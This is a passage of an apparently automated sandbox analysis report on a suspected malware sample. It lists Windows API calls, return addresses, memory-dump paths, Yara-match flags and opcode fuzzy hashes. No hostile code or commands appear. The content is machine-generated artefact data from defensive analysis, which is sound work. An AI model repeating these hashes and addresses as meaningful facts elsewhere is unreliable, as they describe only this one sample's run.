                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 9a87ca9f1921d8e5d737d102ec325e0f3fbec3939bbebe50cb63021560c7c2b5
                                                              • Instruction ID: 3b38f9485682b274162490fe41da4340c4cd90f9761736ada5a1d5ac04a16cf5
                                                              • Opcode Fuzzy Hash: 9a87ca9f1921d8e5d737d102ec325e0f3fbec3939bbebe50cb63021560c7c2b5
                                                              • Instruction Fuzzy Hash: E1F022362803085FEB186F349885ABB7BD6FB8232CB05442CFA018B6C0D2B5AC01CA50
                                                              APIs
                                                                • Part of subcall function 005F150A: EnterCriticalSection.KERNEL32(-0002B867,?,005F6107,?,00616B20,00000008,005F62CB,CE3BFFFF,005EDE01,?,CE3BFFFF,005EDE01,005E112E,?,005F13BE), ref: 005F1519
                                                              • EnumSystemLocalesW.KERNEL32(005F86E3,00000001,00616C80,0000000C,005F8B18,00000000), ref: 005F8728
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 8e764e6814fef9a4c00305147b4f6e8e1c0b2a705037df59fb94431684b16a73
                                                              • Instruction ID: a3deb973064e7fb88f00cc0fe9733f1643adbd7d913ed8331e793bd1aaf1879e
                                                              • Opcode Fuzzy Hash: 8e764e6814fef9a4c00305147b4f6e8e1c0b2a705037df59fb94431684b16a73
                                                              • Instruction Fuzzy Hash: 10F04976A40309DFDB00EFA8E846BAD7BF1FB48721F10805AF510DB2A0CB7959008F90
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601AFC,00000001,00000000,?,?,0060236A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00601BDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: c951cdb95ae1a5b40f68f75338abbebb88124d4808a42af32c50442fee880524
                                                              • Instruction ID: 125a3a6e283f715748772ec1c1dfa356efa501583a87540cf89bac5ac84e5827
                                                              • Opcode Fuzzy Hash: c951cdb95ae1a5b40f68f75338abbebb88124d4808a42af32c50442fee880524
                                                              • Instruction Fuzzy Hash: 61F0E53A38020957CB08AF79D8A9AAB7F96EFC2724B064098EB058F6D1D7759942C750
                                                              APIs
                                                              • GetVersionExA.KERNEL32(00000094), ref: 005E2E80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 5ddd8983a1afa289be40a2fc4c7dc396499965b492db92d29bdc30bfb74340c6
                                                              • Instruction ID: d2ba09f74f9874cd3f640f74caebf7c5274d6cb1810b65222d6181d1251361bd
                                                              • Opcode Fuzzy Hash: 5ddd8983a1afa289be40a2fc4c7dc396499965b492db92d29bdc30bfb74340c6
                                                              • Instruction Fuzzy Hash: 87E09270C0032896FF389A72DC06FB6777CBB51305F4000D8E64C52182E7758A4A8F62
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005F4DAF,?,20001004,00000000,00000002,?,?,005F43A1), ref: 005F8C50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 6e8ac69c02d79d3fd493b7fc07d38b49b5dd5eac6a558d19f71cc30926d9033c
                                                              • Instruction ID: 1f2e51f8732c380b3fbd019952403365b6381a5ce4af48b9ded4239e8fb0d4c1
                                                              • Opcode Fuzzy Hash: 6e8ac69c02d79d3fd493b7fc07d38b49b5dd5eac6a558d19f71cc30926d9033c
                                                              • Instruction Fuzzy Hash: 25E01A3154111DBBCF122F60DC08ABE3F26FF447A1F044410FE456A261CB368D20AAA4
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000A686,005E9E6C), ref: 005EA67F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: de45990036769d17e162b070c2eecaff981167b2d7529574abf0776b2ef42b1e
                                                              • Instruction ID: 64d277bb7dfbca47a241a47ccc0d3ad65f1bc2d77c9f0b7161a4eda5e2810357
                                                              • Opcode Fuzzy Hash: de45990036769d17e162b070c2eecaff981167b2d7529574abf0776b2ef42b1e
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 32095ff44f495dfdc75cc790191de8233210c8c0fab4d97dd96a0816b6683fca
                                                              • Instruction ID: d8221c5e7e7bd4cdb03549e2864ae8fe631f0d6a4c2873bafe91fb280fcd391e
                                                              • Opcode Fuzzy Hash: 32095ff44f495dfdc75cc790191de8233210c8c0fab4d97dd96a0816b6683fca
                                                              • Instruction Fuzzy Hash: D9A012309001008B87004F316A0464937BB59013C0708D06A6405C0020D62040405F10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                              • Instruction ID: a9628147bcf7a6b17228ceb9a55bac32a6dcb634aab7cecca7238de986d92d88
                                                              • Opcode Fuzzy Hash: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                              • Instruction Fuzzy Hash: D5427971618381AFDB24CF24C944B7BBBE9EF88704F08496DF9959B241D734E941CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 744e2b147d42cd38dd97fb1edf12c1da7266ace7ba5a593af8519508b0318ae9
                                                              • Instruction ID: 45f16a42e162995fdf338f4382fd096641de4806dbead657d40a81c5a9a61324
                                                              • Opcode Fuzzy Hash: 744e2b147d42cd38dd97fb1edf12c1da7266ace7ba5a593af8519508b0318ae9
                                                              • Instruction Fuzzy Hash: 72322432D69F054DD7239634C922336A65AAFB73C4F15E727E81AB59A6EF2DC4834100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                              • Instruction ID: f832d95c897acb4ebf1709fafd2482313931031c0884fe1463c3790c4bfdad8b
                                                              • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                              • Instruction Fuzzy Hash: FDD17530718B498BDB29EF2998997FEB7E5FB58705F04422EE85AC3250DF30E5118B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                              • Instruction ID: e9f934fb6abd56ba36fe05759a4166c6fef377aa1ca022ef719f7bfa9a9f3133
                                                              • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                              • Instruction Fuzzy Hash: 64D15C31518B488FDB59EF28C889AEAB7E1FF99310F14466DE88BC7255DF30E5428B41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                              • Instruction ID: f5b87648098f9311119fc0cc71688eacea0c45cb39f942290bc8fe2dd86a115b
                                                              • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                              • Instruction Fuzzy Hash: D3B1B530734A895BCB19EB2ACD956BAB3D1FB89301F58426DC94BC7245DB24F902CB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 4afc6f49a78bbe3c932c0f208ab7137937a03378f0d913431d7502ed916df784
                                                              • Instruction ID: 4c1e2d3548a8bc96c9d6b3ce0cc3817a3b9737f1bbedc18736e821d5e981cdf0
                                                              • Opcode Fuzzy Hash: 4afc6f49a78bbe3c932c0f208ab7137937a03378f0d913431d7502ed916df784
                                                              • Instruction Fuzzy Hash: B4B117755407068BCB3C9F25CC96BF7B3AAFB85308F14452DEA438A6D0EA75A985CB10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                              • Instruction ID: dda3f69604f39ef667a54b6fc503ba781b4ca5766555468746a9a3e28b990152
                                                              • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                              • Instruction Fuzzy Hash: 96A13E31508A4C8FDB55EF28C889BEAB7F9FB58315F14466EE84AC7160EB30D644CB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID: PATH$\
                                                              • API String ID: 485612231-1896636505
                                                              • Opcode ID: 30359bae39aef3e52ce3ddb38ea1b0f731bf021ef0dc9d1365b1cdc8e32e3c2b
                                                              • Instruction ID: 6061e630ea3d5d6e7b2bd57d9a3ef56fa68e7e828449ddee99436885a984b9d8
                                                              • Opcode Fuzzy Hash: 30359bae39aef3e52ce3ddb38ea1b0f731bf021ef0dc9d1365b1cdc8e32e3c2b
                                                              • Instruction Fuzzy Hash: 2C91333190470F9EEF25AF64DC0ABBE7FA9BF05324F14085AE650A61C1EF7D8941CA64
                                                              APIs
                                                                • Part of subcall function 005F7531: RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                                • Part of subcall function 005F7531: GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FC1
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 005F7FCE
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FE3
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FEE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FF9
                                                              • __dosmaperr.LIBCMT ref: 005F8000
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F800B
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8016
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8028
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8033
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8064
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2764183375-0
                                                              • Opcode ID: 2696cc9a873cde2197738230b300433736dd40bced7c658a69eb26f2eb7981d8
                                                              • Instruction ID: 3ef6bd52b8487dad70d5950c9b1c1bf98d14dbfa06c0cdb152ed8725f08e3272
                                                              • Opcode Fuzzy Hash: 2696cc9a873cde2197738230b300433736dd40bced7c658a69eb26f2eb7981d8
                                                              • Instruction Fuzzy Hash: 32516F7294410EFBDF11AFA0E889AFE7F7AFF88311F104095F610A6151DB398A54DBA1
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 005ECEB5
                                                              • type_info::operator==.LIBVCRUNTIME ref: 005ECED7
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 005ECFE6
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 005ED0B8
                                                              • _UnwindNestedFrames.LIBCMT ref: 005ED13C
                                                              • CallUnexpected.LIBVCRUNTIME ref: 005ED157
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              • Opcode ID: 7b069761821d2dbaaeeabd13d25e2697b51ec6e5af5486da66ac903abbb39282
                                                              • Instruction ID: 43dbab2e75ec7ff8da253fec9a9df96c8cc675768a1c2347024cbd8e2445ee29
                                                              • Opcode Fuzzy Hash: 7b069761821d2dbaaeeabd13d25e2697b51ec6e5af5486da66ac903abbb39282
                                                              • Instruction Fuzzy Hash: BEB18E7180028ADFCF1DDFA6C8899AEBFB5FF44310F144169E8916B252D731DA52CBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                              • String ID: bad locale name
                                                              • API String ID: 3904239083-1405518554
                                                              • Opcode ID: 771335bf4a725c9c5c28a07fc89436dd6f2e820b2791e7418de5c83faded9f40
                                                              • Instruction ID: 59eac784c8f416daff9026d0aa2fecb5c462104225e66675954355a0e613dade
                                                              • Opcode Fuzzy Hash: 771335bf4a725c9c5c28a07fc89436dd6f2e820b2791e7418de5c83faded9f40
                                                              • Instruction Fuzzy Hash: F6117FB090569ADFCB0CEB99C869BAEBB71BF40718F14455CE5922B3C2CB755A00C7A1
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00607207,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 00606FDD
                                                              • __alloca_probe_16.LIBCMT ref: 00607098
                                                              • __alloca_probe_16.LIBCMT ref: 00607127
                                                              • __freea.LIBCMT ref: 00607172
                                                              • __freea.LIBCMT ref: 00607178
                                                              • __freea.LIBCMT ref: 006071AE
                                                              • __freea.LIBCMT ref: 006071B4
                                                              • __freea.LIBCMT ref: 006071C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$Info
                                                              • String ID:
                                                              • API String ID: 127012223-0
                                                              • Opcode ID: 64bd7689592fd24d9dfb4947e3246469add97a6b148d9332468efb0196a5df5e
                                                              • Instruction ID: 8f714fb58ae2552514cb9af72ab31208d028d800ec984735289a94b3ea70f522
                                                              • Opcode Fuzzy Hash: 64bd7689592fd24d9dfb4947e3246469add97a6b148d9332468efb0196a5df5e
                                                              • Instruction Fuzzy Hash: 1071E972D4824AABDF289F94CC41BEF7BBBAF45310F280595E905A73C1D635AC418760
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005E9BAD
                                                              • __alloca_probe_16.LIBCMT ref: 005E9BD9
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005E9C18
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E9C35
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005E9C74
                                                              • __alloca_probe_16.LIBCMT ref: 005E9C91
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E9CD3
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005E9CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                              • String ID:
                                                              • API String ID: 2040435927-0
                                                              • Opcode ID: 27d8af83cc87607de81b89a39c6c4a236c9a4f0bf0ea4f13cd7c0509188c2f2a
                                                              • Instruction ID: 4ba7e8ab0851410acf042e67165ddb2888d77083d2b9e1653b560a91783df535
                                                              • Opcode Fuzzy Hash: 27d8af83cc87607de81b89a39c6c4a236c9a4f0bf0ea4f13cd7c0509188c2f2a
                                                              • Instruction Fuzzy Hash: 8651C07290025AAFEB259F66DC49FAB7FAAFF40750F244528FD45E6150E7319C00CB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                              • Instruction ID: 574481f6afd96354d4b1d63977541c3cfef93e2366aaae794448abd73ecbf0d3
                                                              • Opcode Fuzzy Hash: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                              • Instruction Fuzzy Hash: 61B13572E04A9A9FDF168F68CC81BBE7FA5FF55310F144555EA04AB2C2D278A901C7A0
                                                              APIs
